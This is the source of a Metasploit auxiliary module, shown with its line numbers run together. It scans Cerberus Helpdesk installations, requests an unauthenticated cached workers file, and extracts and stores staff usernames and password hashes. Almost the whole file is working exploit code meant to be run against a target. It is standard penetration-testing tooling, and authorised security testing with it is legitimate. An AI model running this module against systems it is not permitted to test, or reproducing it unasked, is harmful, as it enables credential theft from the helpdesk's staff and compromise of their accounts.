Path: blob/master/modules/auxiliary/gather/cerberus_helpdesk_hash_disclosure.rb
19721 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::Remote::HttpClient7include Msf::Auxiliary::Scanner8include Msf::Auxiliary::Report910def initialize11super(12'Name' => 'Cerberus Helpdesk User Hash Disclosure',13'Description' => %q{14This module extracts usernames and password hashes from the Cerberus Helpdesk15through an unauthenticated access to a workers file.16Verified on Version 4.2.3 Stable (Build 925) and 5.4.417},18'References' => [19[ 'EDB', '39526' ]20],21'Author' => [22'asdizzle_', # discovery23'h00die', # module24],25'License' => MSF_LICENSE,26'DisclosureDate' => 'Mar 7 2016'27)2829register_options(30[31OptString.new('TARGETURI', [false, 'URL of the Cerberus Helpdesk root', '/'])32]33)34end3536def run_host(rhost)37begin38['devblocks', 'zend'].each do |site|39url = normalize_uri(datastore['TARGETURI'], 'storage', 'tmp', "#{site}_cache---ch_workers")40vprint_status("Attempting to load data from #{url}")41res = send_request_cgi({ 'uri' => url })42if !res43print_error("#{peer} Unable to connect to #{url}")44next45end4647if !res.body.include?('pass')48print_error("Invalid response received for #{peer} for #{url}")49next50end5152cred_table = Rex::Text::Table.new 'Header' => 'Cerberus Helpdesk User Credentials',53'Indent' => 1,54'Columns' => ['Username', 'Password Hash']5556# the returned object looks json-ish, but it isn't. Unsure of format, so we'll do some ugly manual parsing.57# this will be a rough equivalent to sed -e 's/s:5/\n/g' | grep email | cut -d '"' -f4,8 | sed 's/"/:/g'58result = res.body.split('s:5')59result.each do |cred|60if cred.include?('email')61cred = cred.split(':')62username = cred[3].tr('";', '') # remove extra characters63username = username[0...-1] # also remove trailing s64password_hash = cred[7].tr('";', '') # remove extra characters65print_good("Found: #{username}:#{password_hash}")66store_valid_credential(67user: username,68private: password_hash,69private_type: :nonreplayable_hash70)71cred_table << [username, password_hash]72end73end74print_line75print_line cred_table.to_s76break77end78rescue ::Rex::ConnectionError79print_error("#{peer} Unable to connect to site")80return81end82end83end848586